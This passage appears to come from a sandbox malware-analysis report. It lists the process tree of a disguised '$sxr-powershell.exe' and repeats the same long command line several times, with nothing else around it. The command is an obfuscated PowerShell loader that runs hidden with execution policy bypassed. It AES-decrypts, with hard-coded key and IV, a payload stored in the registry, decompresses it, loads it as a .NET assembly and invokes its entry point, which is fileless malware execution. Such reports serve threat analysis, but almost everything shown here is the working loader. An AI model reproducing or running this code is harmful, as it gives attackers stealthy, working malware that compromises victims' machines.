'')($Rdlce);$UAqSU = New-Object System.Security.Cryptography.AesManaged;$UAqSU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UAqSU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UAqSU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3Cejgnbs4Mq4RjjGVF0oKf3M0OGYhcUdZQT8VjA1BTQ=');$UAqSU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FuFkpEyBBb5eTiUHDuoejw==');$rpUCK = $UAqSU.('rotpyrceDetaerC'[-1..-15] -join '')();$zwdFm = $rpUCK.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zwdFm, 0, $zwdFm.Length);$rpUCK.Dispose();$UAqSU.Dispose();$mWZFi = New-Object System.IO.MemoryStream(, $zwdFm);$rdOGT = New-Object System.IO.MemoryStream;$TtLsl = New-Object System.IO.Compression.GZipStream($mWZFi, [IO.Compression.CompressionMode]::$BoSsL1);$TtLsl.$ezJBd($rdOGT);$TtLsl.Dispose();$mWZFi.Dispose();$rdOGT.Dispose();$zwdFm = $rdOGT.ToArray();$sACye = $htfqf | IEX;$EjRHz = $sACye::$BoSsL2($zwdFm);$adjov = $EjRHz.EntryPoint;$adjov.$BoSsL0($null, (, [string[]] ($tcAmN)))
4⤵
PID:5052

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1252).WaitForExit();[System.Threading.Thread]::Sleep(5000); $UAqSU1 = New-Object System.Security.Cryptography.AesManaged;$UAqSU1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UAqSU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UAqSU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3Cejgnbs4Mq4RjjGVF0oKf3M0OGYhcUdZQT8VjA1BTQ=');$UAqSU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FuFkpEyBBb5eTiUHDuoejw==');$BOQkb = $UAqSU1.('rotpyrceDetaerC'[-1..-15] -join '')();$BoSsL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Hi9IUAdIvyu21FrLc35Wlg==');$BoSsL = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL, 0, $BoSsL.Length);$BoSsL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL);$ROThC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NuWQavY79dzw+av3Hm0iPSLwU4FiMsrTH6wKYXHnmQI=');$ROThC = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ROThC, 0, $ROThC.Length);$ROThC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ROThC);$tcAmN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAk2WftATJZWLNaz5AsOcg==');$tcAmN = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tcAmN, 0, $tcAmN.Length);$tcAmN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tcAmN);$htfqf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00vYPdm3YczDKThMGomP2t4PEP6NyfJ1C5JKdCAh6A/oUSNQeme7j6zRfYjMAujQjLMAjCD1XuFdbpYN4xDIp2LLVjDsenZDFy0y5/WsrDmlf+R2zXEEOVTkkpiynuc9nPRrX+NCyjUkdumv8qpjj3tpd8HQGoFyy3a1n9Qj6no8lIXggnt79qb7guowY2KMsZSxnWbj4puiAQ3jfajaMD/VPUBHdxyubLgHZvEHRDcthlAqFjq6T77sy2JPZiSzx9WmJFIR91f2l2OkQKkLVTuNEcaGNxHDa7BvsZX66E4L+OBfosly2Sfxw9Kdm29xZa+ilA72osygq47c33cRqYdsDL1ibti8yyxK2pTb7UOBDUZxYeZ51SUQtlQoCP/ZXugNu2/+kz+coNBmOi2AUAl+CjzWdQxH2aPTg+gDHro=');$htfqf = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($htfqf, 0, $htfqf.Length);$htfqf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($htfqf);$QZvFz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7kfx/IIgvojG1Y8ORjXrlQ==');$QZvFz = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QZvFz, 0, $QZvFz.Length);$QZvFz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QZvFz);$OWoCp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/HYssHkUfY8L1KxHOXtKvw==');$OWoCp = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OWoCp, 0, $OWoCp.Length);$OWoCp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OWoCp);$IQocv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2fDj9cGG5yOIQCzHyd0wjA==');$IQocv = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IQocv, 0, $IQocv.Length);$IQocv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IQocv);$MFEog = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vFfCR3EWJbL61LHSR35ULw==');$MFEog = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MFEog, 0, $MFEog.Length);$MFEog = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MFEog);$ezJBd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QEqy5NLkcfbNR1XhqxPmNg==');$ezJBd = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ezJBd, 0, $ezJBd.Length);$ezJBd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ezJBd);$BoSsL0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cV3Ch+wNgiNrh3nPXcEdyw==');$BoSsL0 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL0, 0, $BoSsL0.Length);$BoSsL0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL0);$BoSsL1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tAuwPxztI7NTFSZO0GRx+Q==');$BoSsL1 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL1, 0, $BoSsL1.Length);$BoSsL1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL1);$BoSsL2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzza9eWYTaEjCWFmGo3rLw==');$BoSsL2 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL2, 0, $BoSsL2.Length);$BoSsL2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL2);$BoSsL3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNOahjTM/Tm2BvHo8xW75A==');$BoSsL3 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL3, 0, $BoSsL3.Length);$BoSsL3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL3);$BOQkb.Dispose();$UAqSU1.Dispose();$Rdlce = [Microsoft.Win32.Registry]::$MFEog.$IQocv($BoSsL).$OWoCp($ROThC);$zwdFm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($Rdlce);$UAqSU = New-Object System.Security.Cryptography.AesManaged;$UAqSU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UAqSU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UAqSU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3Cejgnbs4Mq4RjjGVF0oKf3M0OGYhcUdZQT8VjA1BTQ=');$UAqSU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FuFkpEyBBb5eTiUHDuoejw==');$rpUCK = $UAqSU.('rotpyrceDetaerC'[-1..-15] -join '')();$zwdFm = $rpUCK.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zwdFm, 0, $zwdFm.Length);$rpUCK.Dispose();$UAqSU.Dispose();$mWZFi = New-Object System.IO.MemoryStream(, $zwdFm);$rdOGT = New-Object System.IO.MemoryStream;$TtLsl = New-Object System.IO.Compression.GZipStream($mWZFi, [IO.Compression.CompressionMode]::$BoSsL1);$TtLsl.$ezJBd($rdOGT);$TtLsl.Dispose();$mWZFi.Dispose();$rdOGT.Dispose();$zwdFm = $rdOGT.ToArray();$sACye = $htfqf | IEX;$EjRHz = $sACye::$BoSsL2($zwdFm);$adjov = $EjRHz.EntryPoint;$adjov.$BoSsL0($null, (, [string[]] ($tcAmN)))
4⤵
PID:4952

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1252).WaitForExit();[System.Threading.Thread]::Sleep(5000); $UAqSU1 = New-Object System.Security.Cryptography.AesManaged;$UAqSU1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UAqSU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UAqSU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3Cejgnbs4Mq4RjjGVF0oKf3M0OGYhcUdZQT8VjA1BTQ=');$UAqSU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FuFkpEyBBb5eTiUHDuoejw==');$BOQkb = $UAqSU1.('rotpyrceDetaerC'[-1..-15] -join '')();$BoSsL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Hi9IUAdIvyu21FrLc35Wlg==');$BoSsL = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL, 0, $BoSsL.Length);$BoSsL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL);$ROThC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NuWQavY79dzw+av3Hm0iPSLwU4FiMsrTH6wKYXHnmQI=');$ROThC = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ROThC, 0, $ROThC.Length);$ROThC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ROThC);$tcAmN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAk2WftATJZWLNaz5AsOcg==');$tcAmN = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tcAmN, 0, $tcAmN.Length);$tcAmN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tcAmN);$htfqf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00vYPdm3YczDKThMGomP2t4PEP6NyfJ1C5JKdCAh6A/oUSNQeme7j6zRfYjMAujQjLMAjCD1XuFdbpYN4xDIp2LLVjDsenZDFy0y5/WsrDmlf+R2zXEEOVTkkpiynuc9nPRrX+NCyjUkdumv8qpjj3tpd8HQGoFyy3a1n9Qj6no8lIXggnt79qb7guowY2KMsZSxnWbj4puiAQ3jfajaMD/VPUBHdxyubLgHZvEHRDcthlAqFjq6T77sy2JPZiSzx9WmJFIR91f2l2OkQKkLVTuNEcaGNxHDa7BvsZX66E4L+OBfosly2Sfxw9Kdm29xZa+ilA72osygq47c33cRqYdsDL1ibti8yyxK2pTb7UOBDUZxYeZ51SUQtlQoCP/ZXugNu2/+kz+coNBmOi2AUAl+CjzWdQxH2aPTg+gDHro=');$htfqf = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($htfqf, 0, $htfqf.Length);$htfqf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($htfqf);$QZvFz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7kfx/IIgvojG1Y8ORjXrlQ==');$QZvFz = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QZvFz, 0, $QZvFz.Length);$QZvFz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QZvFz);$OWoCp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/HYssHkUfY8L1KxHOXtKvw==');$OWoCp = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OWoCp, 0, $OWoCp.Length);$OWoCp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OWoCp);$IQocv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2fDj9cGG5yOIQCzHyd0wjA==');$IQocv = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IQocv, 0, $IQocv.Length);$IQocv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IQocv);$MFEog = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vFfCR3EWJbL61LHSR35ULw==');$MFEog = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MFEog, 0, $MFEog.Length);$MFEog = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MFEog);$ezJBd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QEqy5NLkcfbNR1XhqxPmNg==');$ezJBd = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ezJBd, 0, $ezJBd.Length);$ezJBd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ezJBd);$BoSsL0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cV3Ch+wNgiNrh3nPXcEdyw==');$BoSsL0 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL0, 0, $BoSsL0.Length);$BoSsL0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL0);$BoSsL1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tAuwPxztI7NTFSZO0GRx+Q==');$BoSsL1 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL1, 0, $BoSsL1.Length);$BoSsL1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL1);$BoSsL2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzza9eWYTaEjCWFmGo3rLw==');$BoSsL2 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL2, 0, $BoSsL2.Length);$BoSsL2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL2);$BoSsL3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNOahjTM/Tm2BvHo8xW75A==');$BoSsL3 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL3, 0, $BoSsL3.Length);$BoSsL3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL3);$BOQkb.Dispose();$UAqSU1.Dispose();$Rdlce = [Microsoft.Win32.Registry]::$MFEog.$IQocv($BoSsL).$OWoCp($ROThC);$zwdFm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($Rdlce);$UAqSU = New-Object System.Security.Cryptography.AesManaged;$UAqSU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UAqSU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UAqSU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3Cejgnbs4Mq4RjjGVF0oKf3M0OGYhcUdZQT8VjA1BTQ=');$UAqSU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FuFkpEyBBb5eTiUHDuoejw==');$rpUCK = $UAqSU.('rotpyrceDetaerC'[-1..-15] -join '')();$zwdFm = $rpUCK.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zwdFm, 0, $zwdFm.Length);$rpUCK.Dispose();$UAqSU.Dispose();$mWZFi = New-Object System.IO.MemoryStream(, $zwdFm);$rdOGT = New-Object System.IO.MemoryStream;$TtLsl = New-Object System.IO.Compression.GZipStream($mWZFi, [IO.Compression.CompressionMode]::$BoSsL1);$TtLsl.$ezJBd($rdOGT);$TtLsl.Dispose();$mWZFi.Dispose();$rdOGT.Dispose();$zwdFm = $rdOGT.ToArray();$sACye = $htfqf | IEX;$EjRHz = $sACye::$BoSsL2($zwdFm);$adjov = $EjRHz.EntryPoint;$adjov.$BoSsL0($null, (, [string[]] ($tcAmN)))
4⤵
PID:1648

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1252).WaitForExit();[System.Threading.Thread]::Sleep(5000); $UAqSU1 = New-Object System.Security.Cryptography.AesManaged;$UAqSU1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UAqSU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UAqSU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3Cejgnbs4Mq4RjjGVF0oKf3M0OGYhcUdZQT8VjA1BTQ=');$UAqSU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FuFkpEyBBb5eTiUHDuoejw==');$BOQkb = $UAqSU1.('rotpyrceDetaerC'[-1..-15] -join '')();$BoSsL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Hi9IUAdIvyu21FrLc35Wlg==');$BoSsL = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL, 0, $BoSsL.Length);$BoSsL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL);$ROThC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NuWQavY79dzw+av3Hm0iPSLwU4FiMsrTH6wKYXHnmQI=');$ROThC = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ROThC, 0, $ROThC.Length);$ROThC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ROThC);$tcAmN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAk2WftATJZWLNaz5AsOcg==');$tcAmN = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tcAmN, 0, $tcAmN.Length);$tcAmN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tcAmN);$htfqf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00vYPdm3YczDKThMGomP2t4PEP6NyfJ1C5JKdCAh6A/oUSNQeme7j6zRfYjMAujQjLMAjCD1XuFdbpYN4xDIp2LLVjDsenZDFy0y5/WsrDmlf+R2zXEEOVTkkpiynuc9nPRrX+NCyjUkdumv8qpjj3tpd8HQGoFyy3a1n9Qj6no8lIXggnt79qb7guowY2KMsZSxnWbj4puiAQ3jfajaMD/VPUBHdxyubLgHZvEHRDcthlAqFjq6T77sy2JPZiSzx9WmJFIR91f2l2OkQKkLVTuNEcaGNxHDa7BvsZX66E4L+OBfosly2Sfxw9Kdm29xZa+ilA72osygq47c33cRqYdsDL1ibti8yyxK2pTb7UOBDUZxYeZ51SUQtlQoCP/ZXugNu2/+kz+coNBmOi2AUAl+CjzWdQxH2aPTg+gDHro=');$htfqf = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($htfqf, 0, $htfqf.Length);$htfqf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($htfqf);$QZvFz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7kfx/IIgvojG1Y8ORjXrlQ==');$QZvFz = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QZvFz, 0, $QZvFz.Length);$QZvFz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QZvFz);$OWoCp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/HYssHkUfY8L1KxHOXtKvw==');$OWoCp = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OWoCp, 0, $OWoCp.Length);$OWoCp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OWoCp);$IQocv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2fDj9cGG5yOIQCzHyd0wjA==');$IQocv = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IQocv, 0, $IQocv.Length);$IQocv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IQocv);$MFEog = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vFfCR3EWJbL61LHSR35ULw==');$MFEog = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MFEog, 0, $MFEog.Length);$MFEog = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MFEog);$ezJBd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QEqy5NLkcfbNR1XhqxPmNg==');$ezJBd = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ezJBd, 0, $ezJBd.Length);$ezJBd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ezJBd);$BoSsL0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cV3Ch+wNgiNrh3nPXcEdyw==');$BoSsL0 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL0, 0, $BoSsL0.Length);$BoSsL0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL0);$BoSsL1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tAuwPxztI7NTFSZO0GRx+Q==');$BoSsL1 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL1, 0, $BoSsL1.Length);$BoSsL1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL1);$BoSsL2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzza9eWYTaEjCWFmGo3rLw==');$BoSsL2 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL2, 0, $BoSsL2.Length);$BoSsL2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL2);$BoSsL3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNOahjTM/Tm2BvHo8xW75A==');$BoSsL3 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL3, 0, $BoSsL3.Length);$BoSsL3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL3);$BOQkb.Dispose();$UAqSU1.Dispose();$Rdlce = [Microsoft.Win32.Registry]::$MFEog.$IQocv($BoSsL).$OWoCp($ROThC);$zwdFm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($Rdlce);$UAqSU = New-Object System.Security.Cryptography.AesManaged;$UAqSU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UAqSU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UAqSU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3Cejgnbs4Mq4RjjGVF0oKf3M0OGYhcUdZQT8VjA1BTQ=');$UAqSU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FuFkpEyBBb5eTiUHDuoejw==');$rpUCK = $UAqSU.('rotpyrceDetaerC'[-1..-15] -join '')();$zwdFm = $rpUCK.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zwdFm, 0, $zwdFm.Length);$rpUCK.Dispose();$UAqSU.Dispose();$mWZFi = New-Object System.IO.MemoryStream(, $zwdFm);$rdOGT = New-Object System.IO.MemoryStream;$TtLsl = New-Object System.IO.Compression.GZipStream($mWZFi, [IO.Compression.CompressionMode]::$BoSsL1);$TtLsl.$ezJBd($rdOGT);$TtLsl.Dispose();$mWZFi.Dispose();$rdOGT.Dispose();$zwdFm = $rdOGT.ToArray();$sACye = $htfqf | IEX;$EjRHz = $sACye::$BoSsL2($zwdFm);$adjov = $EjRHz.EntryPoint;$adjov.$BoSsL0($null, (, [string[]] ($tcAmN)))
4⤵
PID:1140

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1252).WaitForExit();[System.Threading.Thread]::Sleep(5000); $UAqSU1 = New-Object System.Security.Cryptography.AesManaged;$UAqSU1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UAqSU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UAqSU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3Cejgnbs4Mq4RjjGVF0oKf3M0OGYhcUdZQT8VjA1BTQ=');$UAqSU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FuFkpEyBBb5eTiUHDuoejw==');$BOQkb = $UAqSU1.('rotpyrceDetaerC'[-1..-15] -join '')();$BoSsL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Hi9IUAdIvyu21FrLc35Wlg==');$BoSsL = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL, 0, $BoSsL.Length);$BoSsL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL);$ROThC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NuWQavY79dzw+av3Hm0iPSLwU4FiMsrTH6wKYXHnmQI=');$ROThC = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ROThC, 0, $ROThC.Length);$ROThC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ROThC);$tcAmN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAk2WftATJZWLNaz5AsOcg==');$tcAmN = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tcAmN, 0, $tcAmN.Length);$tcAmN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tcAmN);$htfqf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00vYPdm3YczDKThMGomP2t4PEP6NyfJ1C5JKdCAh6A/oUSNQeme7j6zRfYjMAujQjLMAjCD1XuFdbpYN4xDIp2LLVjDsenZDFy0y5/WsrDmlf+R2zXEEOVTkkpiynuc9nPRrX+NCyjUkdumv8qpjj3tpd8HQGoFyy3a1n9Qj6no8lIXggnt79qb7guowY2KMsZSxnWbj4puiAQ3jfajaMD/VPUBHdxyubLgHZvEHRDcthlAqFjq6T77sy2JPZiSzx9WmJFIR91f2l2OkQKkLVTuNEcaGNxHDa7BvsZX66E4L+OBfosly2Sfxw9Kdm29xZa+ilA72osygq47c33cRqYdsDL1ibti8yyxK2pTb7UOBDUZxYeZ51SUQtlQoCP/ZXugNu2/+kz+coNBmOi2AUAl+CjzWdQxH2aPTg+gDHro=');$htfqf = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($htfqf, 0, $htfqf.Length);$htfqf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($htfqf);$QZvFz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7kfx/IIgvojG1Y8ORjXrlQ==');$QZvFz = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QZvFz, 0, $QZvFz.Length);$QZvFz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QZvFz);$OWoCp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/HYssHkUfY8L1KxHOXtKvw==');$OWoCp = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OWoCp, 0, $OWoCp.Length);$OWoCp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OWoCp);$IQocv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 